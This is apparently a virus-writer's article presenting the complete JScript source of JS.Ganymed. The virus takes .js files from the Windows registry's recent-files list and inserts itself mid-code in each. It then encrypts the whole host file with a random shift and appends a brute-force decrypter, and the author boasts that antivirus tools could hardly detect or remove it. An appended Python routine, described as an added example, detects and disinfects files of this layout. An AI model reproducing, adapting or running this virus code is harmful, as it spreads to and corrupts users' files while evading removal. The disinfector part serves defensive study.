JS.Ganymed for Windows XP
by Second Part To Hell[rRlf]
www.spth.de.vu
spth@aonmail.at
written on 11.05.2003 in Austria

What's that, you may think. Let me explain: a JavaScript virus which searches for its victims in the registry. This registry key does not exist on Win95/98/Me. The virus infects files in the middle of their code: it searches for a function, copies itself in front of that function and places a call to that function at the start of the host's code. This technique is also called EPO (Entry Point Obscuring). When it has finished infecting a file, it encrypts the whole file (the virus and the host code) with a random number (I first saw the main idea of this technique in jackie's article "don't hide, come out! (jscript encryption, a humble approach)"). Finally it adds a decrypter to the file, one that does not contain the number the file was encrypted with, since otherwise the file would not work at all. That means the virus uses "brute-force polymorphism" (encrypting without saving the encryption key).

General Virus Information:
VirusName................... JS.Ganymed
VirusAuthor................. Second Part To Hell[rRlf]
Infection Way............... Searching files from registry and infecting in the middle of the code
Payload..................... No
Encryption.................. Yes
Encrypt Hostfile............ Yes
EPO......................... Yes
Polymorphism................ Yes
BruteForce.................. Yes

I'm sure it would be hell for AVs to detect this virus; moreover it would be nearly impossible to remove the virus from the file in a way that leaves the file working normally, because the host file needs the virus to become active. Now, many thanks for reading this...
I have to thank jackie for the article he wrote (I tried not to use much of your material).

-------------------------------------[JS.Ganymed for Windows XP]-------------------------------------

Ganymed()
function Ganymed()
{
  var fso=WScript.CreateObject("Scripting.FileSystemObject")
  var shell=WScript.CreateObject("WScript.Shell")
  MRUList=shell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\MRUList")
  for (i=1; i<=MRUList.length; i++)
  {
    file=shell.RegRead("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComDlg32\\OpenSaveMRU\\js\\"+MRUList.substring(i-1,i))
    if (fso.FileExists(file))
    {
      var check=0; code=""; mycode=""; crypt="";
      var line=String.fromCharCode(13)+String.fromCharCode(10)
      victimfile=fso.OpenTextFile(file)
      viccontent=victimfile.ReadAll()
      victimfile.Close()
      infchecka=fso.OpenTextFile(file)
      infcheck=infchecka.ReadLine()
      infchecka.Close()
      if (infcheck!="/* Ganymed")
      {
        victimfile=fso.OpenTextFile(file)
        myfile=fso.OpenTextFile(WScript.ScriptFullName)
        for (j=0; j<500; j++)
        {
          code=myfile.ReadLine();
          if (code=="function Ganymed()")
          {
            mycode+=code+line; j=500;
            for (k=0; k<60; k++) { mycode+=myfile.ReadLine()+line }
          }
        }
        myfile.Close()
        for (l=1; l<viccontent.length; l++)
        {
          victimcodea=victimfile.Read(1)
          if (victimcodea=="f")
          {
            victimcodea+=victimfile.Read(7)
            l+=7;
            if (victimcodea=="function" && check==0 ) { var mark=l-8; var check=1}
          }
        }
        victimfile.Close()
        victimAll=fso.OpenTextFile(file)
        startcode=viccontent.substring(0,mark)
        endcode=viccontent.substring(mark,viccontent.length)
        victim=fso.OpenTextFile(file,2)
        victim.Write("Ganymed()"+line+startcode+line+mycode+line+endcode)
        victim.Close()
      }
      incry=fso.OpenTextFile(file)
      incontent=incry.ReadAll()
      incry.Close()
      rand=Math.round(Math.random()*5)+1
      for (i=0; i<incontent.length; i++) { crypt+=String.fromCharCode(incontent.charCodeAt(i)-rand) }
      cryptvic=fso.OpenTextFile(file,2)
      comma=String.fromCharCode(34)
      cryptvic.Write("/* Ganymed"+line+crypt+line+"*/"+line+"var fso=WScript.CreateObject("+comma+"Scripting.FileSystemObject"+comma+")"+line+"var shell=WScript.CreateObject("+comma+"WScript.Shell"+comma+")"+line+"openme=fso.OpenTextFile(WScript.ScriptFullName)"+line+"for (i=0; i<2; i++) { code=openme.ReadLine() }"+line+"openme.Close()"+line+"check=code.substring(0,1)"+line+"for (j=0; j<10; j++) { if (check=="+comma+"G"+comma+") { var dec=j; }"+line+"check=String.fromCharCode(check.charCodeAt(0)+1) }"+line+"var newcode="+comma+comma+";"+line+"for (k=0; k<code.length; k++) { newcode+=String.fromCharCode(code.charCodeAt(k)+dec) }"+line+"newfile=fso.CreateTextFile("+comma+"decrypt.js"+comma+")"+line+"newfile.Write(newcode)"+line+"newfile.Close()"+line+"shell.Run("+comma+"decrypt.js"+comma+")")
      cryptvic.Close()
    }
  }
}
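The recovery check a defender would want against the file layout described above, as an added example that is not part of the original article: it detects the marker line, recovers the shift the same way the decrypter stub does (the plaintext must begin with the "G" of the injected call, and rand is 1..6), then strips the injected call and the 60-line copied body to restore the host. The host script, the placeholder body and the rand value are constructed fixtures; the code assumes the shifted body contains no CRLF pair, which holds for ordinary source text.

```python
CRLF = "\r\n"
MARKER = "/* Ganymed"          # first line of every infected file
CALL = "Ganymed()" + CRLF      # EPO call the virus prepends to the host
BODY_HEAD = "function Ganymed()"
BODY_LINES = 60                # lines the virus copies after BODY_HEAD

def shift(text, k):
    """Shift every character by k code points; the virus encrypts with k = -rand, rand in 1..6."""
    return "".join(chr(ord(c) + k) for c in text)

def is_infected(content):
    return content.split(CRLF, 1)[0] == MARKER

def recover_shift(cipher):
    """Same trick as the decrypter stub: the plaintext starts with the 'G' of the EPO call."""
    for k in range(1, 7):
        if chr(ord(cipher[0]) + k) == "G":
            return k
    return None

def disinfect(content):
    """Return the original host script, or raise ValueError if the layout does not match."""
    lines = content.split(CRLF)    # [marker, ciphertext, "*/", decrypter stub ...]
    if lines[0] != MARKER:
        raise ValueError("marker line missing")
    k = recover_shift(lines[1])
    if k is None:
        raise ValueError("shift outside the 1..6 range the virus uses")
    plain = shift(lines[1], k)
    if not plain.startswith(CALL):
        raise ValueError("decrypted body does not start with the EPO call")
    head, sep, rest = plain[len(CALL):].partition(CRLF + BODY_HEAD + CRLF)
    if not sep:
        raise ValueError("inserted virus body not found")
    parts = rest.split(CRLF, BODY_LINES + 1)   # 60 copied lines, empty separator, host tail
    if len(parts) != BODY_LINES + 2 or parts[BODY_LINES] != "":
        raise ValueError("inserted body has unexpected length")
    return head + parts[BODY_LINES + 1]        # host code before and after the insertion point

# Constructed fixture: a two-line host and a placeholder body (not the virus code), laid out
# and shifted exactly as the infection routine describes.
HOST = "var x=1;" + CRLF + "function hello() { return x }" + CRLF

def build_sample(rand=3):
    mark = HOST.index("function")              # the virus splits the host at the first "function"
    body = BODY_HEAD + CRLF + "".join("// placeholder %d" % n + CRLF for n in range(BODY_LINES))
    plain = CALL + HOST[:mark] + CRLF + body + CRLF + HOST[mark:]
    return MARKER + CRLF + shift(plain, -rand) + CRLF + "*/" + CRLF + "// decrypter stub omitted"
```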